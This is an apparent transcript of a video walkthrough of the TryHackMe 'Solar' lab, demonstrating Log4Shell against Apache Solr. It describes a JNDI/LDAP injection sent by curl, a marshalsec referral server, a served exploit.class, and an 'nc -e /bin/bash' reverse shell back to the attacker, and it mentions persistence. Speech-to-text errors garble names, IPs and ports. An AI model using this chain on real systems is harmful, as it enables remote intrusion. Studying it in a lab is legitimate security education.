Today I want to do kind of an ELI5 and really quick demonstration of using the GIND or Log4Shell vulnerability that takes advantage of the GIND syntax and engine inside of a very popular, and everybody's heard it by now, but a very popular logging application that's open source that kind of helps with Java logging. And so what the attack basically does is anything that gets sent to the web server gets logged. Well, there was a vulnerability where the logging allowed for syntax of commands to be run and executed, which then could allow for execution of remote code. So I'm going to walk through the components of that. Then I'm going to switch over to my Kali box and kind of show. This is actually thanks to John Hammond and team that made the Try Hack Me room to make this really simple. So I had no excuse not to demonstrate this and walk through it. But let me start by just talking about the core components. So on the left side is the attacker's machine that we're going to go to. And each of these triangles is going to be a terminal window inside that machine. On the left, we have a netcat listener -LVNP that's listening on port 9999. We have a Python HTTP server that's running on port 8000 and sitting in a directory where a file called exploit.java or exploit.class exists for a Java payload. And then I have a Marshall Sec LDAP referral server running on port 1389 in a different window. And so you're going to actually kind of walk through each of the pieces, but let's walk through the flow. A terminal window sends a curl command that has the syntax for GIND pointing back at the attacker's IP, asking it to be reached out to over LDAP through a GIND command. So the victim web server then reaches out in step 2 out to the Marshall Sec LDAP referral server port on 1389, which says, hey, step 3, nope, you need to go to this HTTP server, which is the same attacker, different terminal window on port 8000, and grab this file and execute it, essentially. And so it goes to the server on 8000, it gives it an exploit.class, and it gets executed at the victim web server. And so that file is going to be running under whatever context is running the server that's actually doing this work. And so that could be, God writes, it could be limited depending on the implementation. So then the last step is the victim web server reaches out with a reverse shell connection back to the attacker in my window on port 9999. So we'll go ahead and switch over real quick, maybe relatively, I suppose. Okay, so we're now on our attacker box here, right? And so here's each of these components. We have our netcat listener that'll ultimately receive the reverse shell back. We have our Python HTTP server that'll serve up the exploit.class file. We have the Marshall Sec LDAP referral server that's listening on port 1389 that'll refer ultimately to port 8000, our guy up here on the top right. And then we have our curl command ready to go. So let's explore a little bit of this. I want to look at real quick this exploit.java that got compiled to become the exploit.class that gets executed here by the Java engine on the other side. It basically, you could have it say almost anything, but right now we're going to say Java language runtime, get runtime, execute nc-e/bin/bash 10.10.121.53.99.99. So it establishes that shell, right? So that's essentially what it's asking it to execute. And so we compiled that. But I kind of just want to demonstrate real quick. So no time like the present, we're going to look at the curl command. So we're sending over curl, HTTP 10.10.28.106, which is our victim, 8983, which is the port, our entry point for this write. So solar admin, cores, food, $, and then we're going to write our GIND syntax, right? So we're going to close or open brackets, GIND :LDAP // our attacker, port 1389, like we referenced, right? This little guy over here, our Marshall Sec LDAP server, / exploit, our exploit.class file that we kind of just walked through. So let's execute it. Let's go. So if you'll notice, everything's done. We're connected. Down here on the bottom right, we get the response that says, hey, we did our thing. Over here, we said sent LDAP reference result for exploit redirecting to HTTP 10.10.121.53.8000 exploit.class, right? Exactly as we had hoped. We received the port 8000 call for that Java class. We received the execution, and then ultimately in the top left, we got connection received from 10.10.28.106, which is that. And we can say now, who am I? Right? Okay, I'm Solar. Well, let's go ahead and maybe stabilize our shell so it looks a little prettier. and let's go ahead and start persistence and all of those things. And so I would just say that, go definitely do this. Try Hack Me Room. It's called Solar. It is a fantastic walkthrough of this, and it teaches you all the components all the way down to the enumeration, finding the entry points, attacking it, and then ultimately closing it with a temporary stopgap, and then ultimately updating the software. So fantastic room. But I wanted to demonstrate this and just kind of show you guys how this exploit is done and how I receive that reverse shell that allows me to be on your machine and nobody knows, right? And that's what's scary about this. And the things that could be packed into that Java class could be very, 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 very deep and do a lot of things to check and look for, other methods of exploit. So thank you so much. I appreciate it. Like and comment and subscribe if you will. I really appreciate it. Bye.